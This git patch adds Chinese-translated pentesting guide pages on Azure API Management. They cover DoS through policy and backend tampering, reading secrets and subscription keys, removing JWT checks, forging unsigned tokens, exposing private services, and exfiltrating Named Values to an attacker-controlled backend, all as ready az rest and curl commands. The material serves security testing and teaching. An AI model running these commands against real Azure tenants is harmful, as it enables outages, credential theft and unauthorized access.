From a35a339c772f9cb9a2da905b5b0ba9f95e3d2ae2 Mon Sep 17 00:00:00 2001
From: Translator <github-actions@github.com>
Date: Tue, 23 Dec 2025 16:36:11 +0000
Subject: [PATCH] Translated
 ['src/pentesting-cloud/azure-security/az-post-exploitation/az

---
 .../az-api-management-post-exploitation.md    |  75 ++++++++
 .../az-api-management-privesc.md              | 170 ++++++++++++++++++
 .../az-services/az-api-management.md          |  74 ++++++++
 3 files changed, 319 insertions(+)
 create mode 100644 src/pentesting-cloud/azure-security/az-post-exploitation/az-api-management-post-exploitation.md
 create mode 100644 src/pentesting-cloud/azure-security/az-privilege-escalation/az-api-management-privesc.md
 create mode 100644 src/pentesting-cloud/azure-security/az-services/az-api-management.md

diff --git a/src/pentesting-cloud/azure-security/az-post-exploitation/az-api-management-post-exploitation.md b/src/pentesting-cloud/azure-security/az-post-exploitation/az-api-management-post-exploitation.md
new file mode 100644
index 000000000..64dabc229
--- /dev/null
+++ b/src/pentesting-cloud/azure-security/az-post-exploitation/az-api-management-post-exploitation.md
@@ -0,0 +1,75 @@
+# Azure - API Management Post-Exploitation
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+##  `Microsoft.ApiManagement/service/apis/policies/write` or `Microsoft.ApiManagement/service/policies/write`
+攻击者可通过多种向量触发 denial of service。为阻断合法流量，攻击者会添加值极低的 rate-limiting 和 quota policies，从而有效阻止正常访问：
+```bash
+az rest --method PUT \
+--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>/apis/<api-id>/policies/policy?api-version=2024-05-01" \
+--headers "Content-Type=application/json" \
+--body '{
+"properties": {
+"format": "rawxml",
+"value": "<policies><inbound><rate-limit calls=\"1\" renewal-period=\"3600\" /><quota calls=\"10\" renewal-period=\"86400\" /><base /></inbound><backend><forward-request /></backend><outbound><base /></outbound></policies>"
+}
+}'
+```
+为了阻止特定的合法客户端 IP，攻击者可以添加 IP 过滤策略以拒绝来自选定地址的请求：
+```bash
+az rest --method PUT \
+--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>/apis/<api-id>/policies/policy?api-version=2024-05-01" \
+--headers "Content-Type=application/json" \
+--body '{
+"properties": {
+"format": "rawxml",
+"value": "<policies><inbound><ip-filter action=\"forbid\"><address>1.2.3.4</address><address>1.2.3.5</address></ip-filter><base /></inbound><backend><forward-request /></backend><outbound><base /></outbound></policies>"
+}
+}'
+```
+## `Microsoft.ApiManagement/service/backends/write` or `Microsoft.ApiManagement/service/backends/delete`
+要使请求失败，攻击者可以修改 backend 配置并将其 URL 更改为无效或无法访问的地址：
+```bash
+az rest --method PUT \
+--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>/backends/<backend-id>?api-version=2024-05-01" \
+--headers "Content-Type=application/json" "If-Match=*" \
+--body '{
+"properties": {
+"url": "https://invalid-backend-that-does-not-exist.com",
+"protocol": "http"
+}
+}'
+```
+或者删除 backends:
+```bash
+az rest --method DELETE \
+--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>/backends/<backend-id>?api-version=2024-05-01" \
+--headers "If-Match=*"
+```
+## `Microsoft.ApiManagement/service/apis/delete`
+要使关键 APIs 无法使用，攻击者可以直接从 API Management service 删除它们：
+```bash
+az rest --method DELETE \
+--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>/apis/<api-id>?api-version=2024-05-01" \
+--headers "If-Match=*"
+```
+## `Microsoft.ApiManagement/service/write` or `Microsoft.ApiManagement/service/applynetworkconfigurationupdates/action`
+要阻止来自互联网的访问，攻击者可以在 API Management 服务上禁用公共网络访问：
+```bash
+az rest --method PATCH \
+--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>?api-version=2024-05-01" \
+--headers "Content-Type=application/json" \
+--body '{
+"properties": {
+"publicNetworkAccess": "Disabled"
+}
+}'
+```
+## `Microsoft.ApiManagement/service/subscriptions/delete`
+为了阻止合法用户访问，攻击者可以删除 API Management 的订阅：
+```bash
+az rest --method DELETE \
+--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>/subscriptions/<apim-subscription-id>?api-version=2024-05-01" \
+--headers "If-Match=*"
+```
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-api-management-privesc.md b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-api-management-privesc.md
new file mode 100644
index 000000000..4b61e1334
--- /dev/null
+++ b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-api-management-privesc.md
@@ -0,0 +1,170 @@
+# Az - API Management Privesc
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## `Microsoft.ApiManagement/service/namedValues/read` & `Microsoft.ApiManagement/service/namedValues/listValue/action`
+
+该攻击涉及访问存储在 Azure API Management Named Values 中的敏感机密，攻击者可以通过直接检索机密值，或滥用权限通过 managed identities 获取 Key Vault 支持的机密。
+```bash
+az apim nv show-secret --resource-group <resource-group> --service-name <service-name> --named-value-id <named-value-id>
+```
+## `Microsoft.ApiManagement/service/subscriptions/read` & `Microsoft.ApiManagement/service/subscriptions/listSecrets/action`
+对于每个订阅，攻击者可以通过使用 listSecrets 端点并使用 POST 方法获取订阅密钥：
+```bash
+az rest --method POST \
+--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>/subscriptions/<subscription-sid>/listSecrets?api-version=2024-05-01"
+```
+响应包含订阅主密钥 (primaryKey) 和辅助密钥 (secondaryKey)。凭借这些密钥，攻击者可以对通过 API Management Gateway 发布的 APIs 进行身份验证并访问：
+```bash
+curl -H "Ocp-Apim-Subscription-Key: <primary-key-or-secondary-key>" \
+https://<service-name>.azure-api.net/<api-path>
+```
+攻击者可以访问与该订阅相关的所有 API 和产品。如果该订阅可以访问敏感产品或 API，攻击者可能会获取机密信息或执行未授权的操作。
+
+## `Microsoft.ApiManagement/service/policies/write` or `Microsoft.ApiManagement/service/apis/policies/write`
+
+攻击者首先检索当前的 API 策略：
+```bash
+az rest --method GET \
+--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>/apis/<api-id>/policies/?api-version=2024-05-01&format=rawxml"
+```
+攻击者可以根据其目标以多种方式修改策略。例如，为了禁用身份验证，如果策略包含 JWT token validation，攻击者可以删除或注释该部分：
+```xml
+<policies>
+<inbound>
+<base />
+<!-- JWT validation removed by the attacker -->
+<!-- <validate-jwt header-name="Authorization" failed-validation-httpcode="401" >
+...
+</validate-jwt> -->
+</inbound>
+<backend>
+<base />
+</backend>
+<outbound>
+<base />
+</outbound>
+<on-error>
+<base />
+</on-error>
+</policies>
+```
+为了移除 rate limiting controls 并允许 denial-of-service attacks，攻击者可以移除或注释掉 quota 和 rate-limit policies：
+```xml
+<policies>
+<inbound>
+<base />
+<!-- Rate limiting removed by the attacker -->
+<!-- <rate-limit calls="100" renewal-period="60" />
+<quota-by-key calls="1000" renewal-period="3600" counter-key="@(context.Subscription.Id)" /> -->
+</inbound>
+...
+</policies>
+```
+要修改后端路由并将流量重定向到攻击者控制的服务器：
+```xml
+<policies>
+...
+<inbound>
+<base />
+<set-backend-service base-url="https://attacker-controlled-server.com" />
+</inbound>
+...
+</policies>
+```
+随后攻击者应用修改后的策略。请求主体必须是一个包含以 XML 格式表示策略的 JSON 对象：
+```bash
+az rest --method PUT \
+--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>/apis/<api-id>/policies/policy?api-version=2024-05-01" \
+--headers "Content-Type=application/json" \
+--body '{
+"properties": {
+"format": "rawxml",
+"value": "<policies><inbound><base /></inbound><backend><base /></backend><outbound><base /></outbound><on-error><base /></on-error></policies>"
+}
+}'
+```
+## JWT 验证 错误配置
+
+攻击者需要知道某个 API 使用 JWT token 验证且该策略配置错误。配置不当的 JWT 验证策略可能包含 `require-signed-tokens="false"` 或 `require-expiration-time="false"`，这会允许服务接受未签名的 tokens 或 永不过期的 tokens。
+
+攻击者使用 none 算法 (unsigned) 创建一个恶意 JWT token：
+```
+# Header: {"alg":"none"}
+# Payload: {"sub":"user"}
+eyJhbGciOiJub25lIn0.eyJzdWIiOiJ1c2VyIn0.
+```
+攻击者使用恶意令牌向 API 发送请求：
+```bash
+curl -X GET \
+-H "Authorization: Bearer eyJhbGciOiJub25lIn0.eyJzdWIiOiJ1c2VyIn0." \
+https://<apim>.azure-api.net/path
+```
+如果策略被错误配置为 `require-signed-tokens="false"`，服务将接受未签名的令牌。 如果 `require-expiration-time="false"`，攻击者也可以创建没有过期声明的令牌。
+
+## `Microsoft.ApiManagement/service/applynetworkconfigurationupdates/action`
+攻击者首先检查服务的当前网络配置：
+```bash
+az rest --method GET \
+--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<apim>?api-version=2024-05-01"
+```
+攻击者会查看 JSON 响应以验证 `publicNetworkAccess` 和 `virtualNetworkType` 的值。如果 `publicNetworkAccess` 设置为 false 或 `virtualNetworkType` 设置为 Internal，则该服务配置为私有访问。
+
+要将服务暴露到 Internet，攻击者必须更改这两个设置。如果服务以内部模式运行（`virtualNetworkType: "Internal"`），攻击者会将其改为 None 或 External 并启用公共网络访问。可以使用 Azure Management API 完成此操作：
+```bash
+az rest --method PATCH \
+--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<apim>?api-version=2024-05-01" \
+--headers "Content-Type=application/json" \
+--body '{
+"properties": {
+"publicNetworkAccess": "Enabled",
+"virtualNetworkType": "None"
+}
+}'
+```
+一旦 `virtualNetworkType` 被设置为 `None` 或 `External` 并且 `publicNetworkAccess` 被启用，服务及其所有 APIs 就会从 Internet 可访问，即使它们之前受私有网络或私有终端节点保护。
+
+## `Microsoft.ApiManagement/service/backends/write`
+攻击者首先枚举现有的 backends 以确定要修改的哪一个：
+```bash
+az rest --method GET \
+--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>/backends?api-version=2024-05-01"
+```
+攻击者获取要修改的后端的当前配置：
+```bash
+az rest --method GET \
+--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>/backends/<backend-id>?api-version=2024-05-01"
+```
+攻击者将后端 URL 修改为指向他们控制的服务器。首先，他们从之前的响应中获取 ETag，然后更新后端：
+```bash
+az rest --method PUT \
+--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>/backends/<backend-id>?api-version=2024-05-01" \
+--headers "Content-Type=application/json" "If-Match=*" \
+--body '{
+"properties": {
+"url": "https://attacker-controlled-server.com",
+"protocol": "http",
+"description": "Backend modified by attacker"
+}
+}'
+```
+或者，攻击者可以配置 backend headers 来 exfiltrate 包含机密的 Named Values。 这是通过 backend credentials configuration 完成的：
+```bash
+az rest --method PUT \
+--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>/backends/<backend-id>?api-version=2024-05-01" \
+--headers "Content-Type=application/json" "If-Match=*" \
+--body '{
+"properties": {
+"url": "https://attacker-controlled-server.com",
+"protocol": "http",
+"credentials": {
+"header": {
+"X-Secret-Value": ["{{named-value-secret}}"]
+}
+}
+}
+}'
+```
+通过此配置，Named Values 会作为 headers 在所有发往攻击者控制的后端的请求中发送，从而使敏感机密得以外泄。
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/azure-security/az-services/az-api-management.md b/src/pentesting-cloud/azure-security/az-services/az-api-management.md
new file mode 100644
index 000000000..04766a51c
--- /dev/null
+++ b/src/pentesting-cloud/azure-security/az-services/az-api-management.md
@@ -0,0 +1,74 @@
+# Az - API Management
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## 基本信息
+
+Azure API Management (APIM) 是一个完全托管的服务，提供一个**用于发布、保护、转换、管理和监控 APIs 的统一平台**。它使组织能够**集中其 API** 战略，并确保在所有服务中实现一致的治理、性能和安全。通过在后端服务与 API 消费者之间作为抽象层，APIM 简化了集成并提高了可维护性，同时提供关键的运营与安全能力。
+
+## 核心概念
+
+**API 网关** 作为所有 API 流量的单一入口点，处理将请求路由到后端服务、实施速率限制、缓存响应以及管理认证和授权等功能。此网关由 Azure 完全托管，确保高可用性和可扩展性。
+
+**开发者门户 (Developer Portal)** 提供一个自助环境，API 消费者可以在此发现可用的 APIs、阅读文档并测试端点。它通过提供交互式工具和访问订阅信息来简化入门流程。
+
+**管理门户 (Management Portal / Management Plane)** 由管理员用于配置和维护 APIM 服务。管理员可以在此定义 API 与操作、配置访问控制、应用策略、管理用户并将 APIs 组织为产品。该门户集中管理并确保一致的 API 治理。
+
+## 认证与授权
+
+Azure API Management 支持多种**认证机制**来保护 API 访问。这些包括 **subscription keys**、**OAuth 2.0 tokens** 和 **client certificates**。APIM 还与 **Microsoft Entra ID** 原生集成，实现**企业级身份管理**和对 API 及后端服务的**安全访问**。
+
+## 策略
+
+APIM 中的策略允许管理员在不同粒度级别上自定义**请求与响应处理**，包括**service**、**API**、**operation** 或 **product** 级别。通过策略，可以实施 **JWT token validation**、**转换 XML 或 JSON 有效负载**、**应用速率限制**、**按 IP 地址限制调用**，或**使用 managed identities 对后端服务进行身份验证**。策略具有**高度灵活性**，是 API Management 平台的**核心优势**之一，使得在不修改后端代码的情况下实现对运行时行为的**细粒度控制**。
+
+## 命名值
+
+该服务提供一种称为 **Named Values** 的机制，允许存储**配置信息**，例如**secrets**、**API keys** 或策略所需的其他值。
+
+这些值可以直接存储在 APIM 内，或从 **Azure Key Vault** 安全引用。Named Values 促进了配置信息的**安全且集中化管理**，并通过允许**可重用引用**而不是硬编码值来简化策略编写。
+
+## 网络与安全集成
+
+Azure API Management 可与**虚拟网络环境**无缝集成，支持与后端系统的**私有且安全的连接**。
+
+当部署在 **Virtual Network (VNet)** 内时，APIM 可以访问**内部服务**而无需公开暴露它们。该服务还允许配置**自定义证书**以支持与后端服务的**双向 TLS (mutual TLS) 认证**，在需要**强身份验证**的场景中提升安全性。
+
+这些**网络特性**使得 APIM 适用于**云原生**和**混合架构**。
+
+### 枚举
+
+要枚举 API 管理服务：
+```bash
+# Lists all Named Values configured in the Azure API Management instance
+az apim nv list --resource-group <resource-group> --service-name <service-name>
+
+# Retrieves all policies applied at the API level in raw XML format
+az rest --method GET \
+--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>/apis/<api-id>/policies/?api-version=2024-05-01&format=rawxml"
+
+# Retrieves the effective policy for a specific API in raw XML format
+az rest --method GET \
+--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>/apis/<api-id>/policies/policy?api-version=2024-05-01&format=rawxml"
+
+# Gets the configuration details of the APIM service instance
+az rest --method GET \
+--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<apim>?api-version=2024-05-01"
+
+# Lists all backend services registered in the APIM instance
+az rest --method GET \
+--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>/backends?api-version=2024-05-01"
+
+# Retrieves details of a specific backend service
+az rest --method GET \
+--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>/backends/<backend-id>?api-version=2024-05-01"
+
+# Gets general information about the APIM service
+az rest --method GET \
+--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>?api-version=2024-05-01"
+
+# Calls an exposed API endpoint through the APIM gateway
+curl https://<apim>.azure-api.net/<api-path>
+
+```
+{{#include ../../../banners/hacktricks-training.md}}